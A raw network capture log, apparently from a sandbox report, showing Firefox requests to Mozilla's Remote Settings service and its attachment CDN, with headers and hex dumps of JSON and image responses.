2024-07-26 18:11:05 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 933 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:05 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.5	64274	34.149.100.209	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2612 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:05 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.5	64277	34.149.100.209	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2612 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:05 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.5	64280	34.117.121.53	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	334	OUT	GET /main-workspace/quicksuggest/ae974b57-6287-44fb-a8d4-9c2ba83914fc HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840741544406 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 5174 x-goog-hash: crc32c=ZXPw0w== x-goog-hash: md5=WavZEWSqFE1cFN4QvROccA== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 5174 X-GUploader-UploadID: AHxI1nP3EiYyL2KDlgIlLa2xga_YAwD5kXpDX8-l3nuhtKoVyoIbqUTGCm8BZIftvTYSnDbrr9Hj2qD84A Server: UploadServer Date: Wed, 24 Jul 2024 17:30:09 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:41 GMT ETag: "59abd91164aa144d5c14de10bd139c70" Content-Type: application/octet-stream Age: 175256 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 13 fd 49 44 41 54 78 9c ed 9d 7b 54 54 d5 bf c0 bf 67 ce 9c 99 81 91 d7 c8 53 40 14 10 44 7f 84 28 04 ca 0f 4b 28 21 d2 65 25 0b 5f e0 ab 95 59 be 42 ad 24 35 b9 d2 ea 97 65 f4 d3 55 60 2d a5 cc ba 69 8a 26 48 2a 51 bf 6e 9a 82 d7 04 0c 0c 43 71 18 e5 35 0a 08 c3 3c ce cc 39 67 df 3f b6 bf e3 04 0c 91 75 ef fe e3 9e cf 1f b3 66 f6 d9 67 9f 3d fb b3 cf 7e 7c cf 2c a0 10 42 20 41 0e 19 e9 0a fc 7f 47 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 Data Ascii: PNGIHDRL\IDATx{TTgS@D(K(!e%_YB$5eU`-i&H*QnCq5<9g?ufg=~\|,B AG@Ia$F@Ia$F@Ia$F@Ia$F@Ia$F@Ia$F@Ia$
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: a8 7b c3 1a 02 a0 dd f2 52 e9 c1 0a e7 79 fe f8 f1 e3 5a ad b6 5f ba c9 64 02 80 0d 1b 36 e4 e7 e7 8b 89 d5 d5 d5 d5 d5 d5 e7 cf 9f 3f 7c f8 b0 93 93 93 58 c2 77 df 7d 57 53 53 e3 ee ee 2e e6 b4 58 2c 5f 7f fd b5 d1 68 fc fb df ff 0e 00 1c c7 2d 5b b6 ec e0 c1 83 62 86 ca ca ca ca ca ca 8b 17 2f 16 15 15 31 0c 53 57 57 57 5e 5e 0e 00 91 91 91 6b d6 ac b1 af c9 3f fe f1 8f e2 e2 62 00 48 4f 4f 07 80 8a 8a 8a ba ba ba 7e b5 4d 49 49 49 4d 4d 15 ba 8c 7d 65 95 14 c8 00 68 b9 dc 55 fe d0 28 97 e7 e3 9d 17 4d a6 d4 83 df 58 fd 70 28 80 52 ca 29 50 52 40 03 00 02 ab 72 5c 80 f3 c2 c9 4c 6c 20 ed e3 62 3a 54 d3 b3 f3 b4 0c 54 00 00 20 78 ec 9a a3 98 1a c4 b7 f4 b0 e7 9a 4d 07 7e b2 b5 77 ca 40 01 80 80 a6 c1 41 5f e8 e9 e9 e9 ea ea 02 80 55 ab 56 4d 99 32 85 e7 Data Ascii: {RyZ_d6?\|Xw}WSS.X,_h-[b/1SWWW^^k?bHOO~MIIIMM}ehU(MXp(R)PR@r\Ll b:TT xM~w@A_UVM2
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: e6 b0 5e ff f5 02 13 e9 e7 ba e9 b1 ce 97 bf e8 db 7b 41 bd 22 9e 1e 35 c8 56 06 86 98 03 10 cb 81 8c a6 47 f6 ff c2 c3 44 e6 ae 02 19 0d 83 6d 32 58 96 ad a8 a8 28 2e 2e 6e 68 68 c0 29 89 89 89 4a a5 12 6f 76 fc fd fd 01 e0 e4 c9 93 78 ca dd b1 63 c7 f9 f3 e7 93 92 92 00 20 2c 2c ac 5f 77 c6 89 8b 16 2d ca ca ca ca cc cc 5c b8 70 21 5e ae 58 ad 56 5f 5f 5f 4f 4f 4f 00 a8 a8 a8 b0 cf 7f ee dc 39 00 d0 68 34 01 01 01 78 3d 63 32 99 e4 72 f9 f6 ed db f1 6d e7 e2 e2 f2 ea ab af ca e5 72 9e ef 3f 84 86 84 84 e0 6b 2d 5e bc 38 2b 2b cb cb cb 0b 00 80 13 90 99 a3 c7 6a 5c b7 3e 36 b2 78 19 a3 f1 b1 5c be d6 bb ad 1c 00 d4 4b 63 14 63 47 5b 5b 5a 2c 5f ff e2 b0 a1 1c 1d 50 26 06 7b 1f 5d a9 4a 8b 70 94 61 68 9c 97 c6 7a 1d 7d 56 3e 76 90 5d 18 45 51 af bf fe 7a Data Ascii: ^{A"5VGDm2X(..nhh)Jovxc ,,_w-\p!^XV___OOO9h4x=c2rmr?k-^8++j\>6x\KccG[[Z,_P&{]Jpahz}V>v]EQz
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 71 e3 00 40 a9 54 56 55 55 e1 2b 1a 0c 86 d0 d0 50 f8 f7 5a 20 2b 2b 6b 60 c9 1b 37 6e 9c 3b 77 ee a0 95 51 ab d5 4d 4d 4d 8e 1a 73 08 1c 6f c4 cc 36 01 2c e2 10 84 fa ac c8 c1 34 72 1f 9b 80 c0 7a ff 0e e0 69 e0 07 19 df 68 9a c6 3d 1d ef aa c4 bd d5 1b 6f bc 91 91 91 31 6a d4 28 00 c0 a1 7f 85 42 a1 52 a9 e2 e3 e3 59 96 b5 58 2c bf fe fa 2b cf f3 81 81 81 de de de 2c cb 06 06 06 e2 fd 1a c3 30 e1 e1 e1 0a 85 42 10 04 9e e7 f1 e8 8f 9f e1 b8 b9 b9 85 84 84 20 84 1a 1a 1a 3a 3a 3a 5e 7b ed b5 b0 b0 b0 b9 73 e7 e2 ae ca b2 6c 6e 6e ee 89 13 27 64 32 99 18 5e b5 7f 55 a9 54 61 61 61 72 b9 1c ef ab 83 82 82 54 2a 55 64 64 24 c3 30 cd cd cd 9d 9d 9d ce ce ce e3 c6 8d a3 28 ca c7 c7 67 e0 1e 65 38 38 14 40 fb bb 39 3f 36 89 a2 69 a0 00 38 41 a6 71 92 b9 3b 39 Data Ascii: q@TVUU+PZ ++k`7n;wQMMMso6,4rzih=o1j(BRYX,+,0B :::^{slnn'd2^UTaaarT*Udd$0(ge88@9?6i8Aq;9
2024-07-26 18:11:05 UTC	302	IN	Data Raw: 60 c1 a5 4b 97 6a 6b 6b 23 22 22 c4 10 90 87 87 c7 dc b9 73 3b 3a 3a 70 14 01 33 69 d2 a4 99 33 67 da af 02 59 96 4d 4e 4e 06 80 94 94 14 8d 46 23 06 4a 9f 7d f6 d9 86 86 06 9d 4e 77 e5 ca 15 84 50 5a 5a 9a bf bf bf f8 e0 01 00 b6 6e dd 6a b1 58 ba ba ba e2 e2 e2 00 20 2e 2e 4e af d7 f7 8b 32 89 81 23 9c a1 b5 b5 75 ca 94 29 f6 f1 a2 07 c0 61 34 54 e2 ff 06 e9 d7 d1 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 04 10 46 12 40 18 49 00 61 24 01 84 91 Data Ascii: `Kjkk#""s;::p3i3gYMNNF#J}NwPZZnjX ..N2#u)a4TF@Ia$F@Ia$F@Ia$F@Ia$F@Ia$F@Ia$F@Ia$F@Ia$F@Ia$F@Ia$

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.5	64278	34.149.100.209	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2612 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:05 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.5	64275	34.117.121.53	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	334	OUT	GET /main-workspace/quicksuggest/0fadd772-b5da-4b3f-9153-9ed8d41930f7 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	681	IN	HTTP/1.1 200 OK x-goog-generation: 1721840740940435 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 9608 x-goog-hash: crc32c=mbkWpw== x-goog-hash: md5=UFSICVb258q6G+nw2nK9gg== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 9608 X-GUploader-UploadID: AHxI1nPwhPWBFDlIC9Z6Y7X03-NYwbSvtX20S6i9fH3thKsRfwUxXF9USQLtL0rBjsjlD1UqirI Server: UploadServer Date: Wed, 24 Jul 2024 17:30:08 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:40 GMT ETag: "5054880956f6e7caba1be9f0da72bd82" Content-Type: application/octet-stream Age: 175257 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	709	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 7e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d Data Ascii: JFIFDuckyd~http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf=
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 63 39 30 33 33 31 33 34 2d 34 62 61 33 2d 34 31 39 32 2d 38 33 62 37 2d 64 34 31 35 35 39 65 37 38 35 39 33 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 63 39 30 33 33 31 33 34 2d 34 62 61 33 2d 34 31 39 32 2d 38 33 62 37 2d 64 34 31 35 35 39 65 37 38 35 39 33 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 Data Ascii: (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c9033134-4ba3-4192-83b7-d41559e78593" stRef:documentID="xmp.did:c9033134-4ba3-4192-83b7-d41559e78593"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>C
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 4b f0 b1 e2 93 88 f8 9a 61 85 6e 7b 79 06 d6 3e 6a b1 51 8f 65 99 70 fa ef fd 2d dd b7 20 f0 14 49 a5 cb 6d b9 58 a5 52 6e c1 92 59 bb 91 66 e8 48 0a b5 55 15 18 bc 29 56 48 8a b8 ca cc e1 c9 fb d6 53 5f 46 92 a4 9e e3 61 b8 39 bd 05 68 8e 83 28 0f 4c 33 08 ee 68 aa 62 67 1d e1 d5 36 db 24 7c 84 4c 35 17 1b 60 9a fc 1b 71 18 66 77 a8 b6 d5 6e 2a 7a 8d 34 63 66 e9 03 f2 64 0f 19 ba 09 b9 c3 c9 c8 d9 4e a8 95 71 69 44 4a 22 51 12 88 94 44 a2 25 11 28 8b 5e 9f 4a a8 a0 3c 46 b1 d7 fd a5 63 71 f9 be b9 f9 a4 3c ab 4c 38 1e be 99 5f 73 ff 00 bd 55 fb 1d 02 b6 b9 19 1e ec 1f 58 ff 00 e7 e6 ff 00 46 99 56 83 90 3d a3 f0 f2 ab 57 bd fb 99 4c dc 53 79 bd 4b 36 5c 39 38 1f 67 4e 24 f8 4e e5 ce 18 cb 2f e2 6b 0a 0e d9 c8 f2 b8 d5 dc 2d f4 9d e0 79 75 a4 a2 60 2d 9b Data Ascii: Kan{y>jQep- ImXRnYfHU)VHS_Fa9h(L3hbg6$\|L5`qfwn*z4cfdNqiDJ"QD%(^J<Fcq<L8_sUXFV=WLSyK6\98gN$N/k-yu`-
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: d1 57 0e 5d 01 65 a0 fe b4 f7 8f e8 cf 13 d6 70 f0 bd 2d d9 8d 66 2e fb 44 3e d7 58 a9 8f 08 90 d9 8c ed 83 f9 3a 2f 68 a9 56 6b aa a6 a0 24 a2 2d 6b 9d 22 bc 95 6d 64 9e 28 f9 71 b5 b2 e9 07 c8 63 6b 3f 1b e3 29 97 8d 84 14 40 f7 2c 15 bc 49 59 d6 bd 61 4c 20 67 0c df 4f a8 c5 c0 77 a6 bc 5a 89 1b 63 10 40 35 1f 83 2d ba aa d3 94 96 57 aa 07 88 ae 93 d5 55 80 bf 5b 8a 92 5d 91 3f e6 98 c7 c6 b7 7b 1b 3f 6a bd d9 21 6a a8 a2 cb db 64 95 31 b8 3d c2 59 ea 01 9f fc 23 3d a0 fd dc f1 0d ed de 2e 24 b0 67 d5 8f dc 87 c2 ac 1e f2 ef 52 ef 83 b7 73 fa 9f f7 ad 89 bd 18 98 17 b1 1c 33 c2 45 d1 0e 44 2e 7d 40 65 49 78 d1 39 40 0a ab 26 ac ad 2b 7c eb 26 6f f8 89 f4 4a 15 f9 3d 5f 29 13 56 66 70 b0 aa 0a 8c d5 68 80 98 8a 96 db 46 07 f9 c4 53 4b a7 c8 90 5f d2 a9 Data Ascii: W]ep-f.D>X:/hVk$-k"md(qck?)@,IYaL gOwZc@5-WU[]?{?j!jd1=Y#=.$gRs3ED.}@eIx9@&+\|&oJ=_)VfphFSK_
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 2e 6e 45 dd 76 a9 f6 6a 25 5b ee a8 7c 7d d1 f3 ab 37 bd fb 99 59 6f 05 f3 7d 7d 4b b2 ed 0c 29 98 32 14 6a f3 56 06 28 c9 37 c4 3b 77 aa 47 39 96 b3 ec 4b a2 e5 8c 42 49 24 52 5d 58 f5 a4 20 e2 d7 49 07 a5 6e e5 05 0c 91 8e 07 02 38 21 cc 5e 53 94 4d f2 eb 6f d6 5b 64 a3 05 ca f1 4b 6f a8 21 de c1 34 f0 c4 44 3a b8 ea c2 66 cf b7 56 21 dd d5 d4 49 7c aa eb 95 9a db 2b 41 70 bb 52 db e7 21 de c1 34 f0 c4 6e 3a b8 ee 11 33 67 d3 70 90 eb d5 77 67 5f 5a 6f 4e 99 f6 da 88 92 b8 6e 4c 1d 98 2d f8 18 76 a7 7f 2d 37 37 8c ef 38 a8 88 c6 49 89 4a 77 52 12 4f a1 08 83 16 c0 63 90 05 45 0e 52 80 98 3b 6b d7 a6 c4 f8 76 aa 78 e9 a9 af d4 55 15 13 be 80 01 57 01 99 bf 92 c0 26 e4 ef f0 45 97 86 1b de 1d aa 9a 3a 6a 6b f5 14 f5 13 3e 80 01 55 01 99 bf 92 00 26 4e e5 Data Ascii: .nEvj%[\|}7Yo}}K)2jV(7;wG9KBI$R]X In8!^SMo[dKo!4D:fV!I\|+ApR!4n:3gpwg_ZoNnL-v-778IJwROcER;kvxUW&E:jk>U&N
